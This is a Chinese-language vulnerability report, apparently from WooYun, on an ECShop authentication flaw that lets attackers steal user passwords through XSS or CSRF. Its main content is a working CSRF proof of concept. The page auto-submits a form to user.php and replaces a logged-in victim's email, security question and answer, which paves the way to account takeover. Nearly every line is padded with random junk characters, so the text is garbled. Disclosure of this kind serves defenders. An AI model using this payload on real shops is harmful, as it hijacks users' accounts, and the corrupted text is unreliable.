简要描述:) |2 m8 i: F) u3 O5 q P3 P
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
4 t8 }8 O9 p: @- F6 e; b, E4 f% h0 A F) B! J
Demo For:http://www.wooyun.org/bug.php?action=view&id=395; ~- _* G; o* }5 o& G" ~
; C9 F. f3 m& E0 E. G! A5 E# {9 C详细说明:
2 W# u& a' B9 z利用csrf和xss可以突破官方所说的“障碍”8 A, @# h5 K8 B/ F" {5 `9 a$ u
xss版本已经有人说明
1 p# K( D0 D5 c* Z这里给出csrf版本+ K& E6 a' @8 N i
; Y/ j; t1 H2 l$ w: d; f# [
漏洞证明:% w/ f% ?% [' R. C- y+ f
<html>; a- a v3 a5 c* a
<body># f, g" p+ Q- {- ?7 X, F( {
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 S) V, d y8 v. a/ Z# F' W<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) |: t6 `, m4 g: k) `
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
0 w* k* h( z/ J3 M& `4 Z$ H/ H$ }<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 i! i6 W# e' Y; @% L& d- L- T" C
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
- d, R" W5 s3 X, G# b7 o+ ^</body>
& q3 f( l4 K" o7 e* h& }+ I" M<script>
, ]0 }! j( G B6 ]document.forms[0].submit();( ?2 i, ?8 D9 o8 O
</script>/ r2 s* ^/ q6 I3 y6 V! ^7 `5 F
</html>
- l7 [: T: B! L; c3 m _构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
. ^6 \; }+ l/ j3 V* R& F6 i
~/ G! O3 c' k |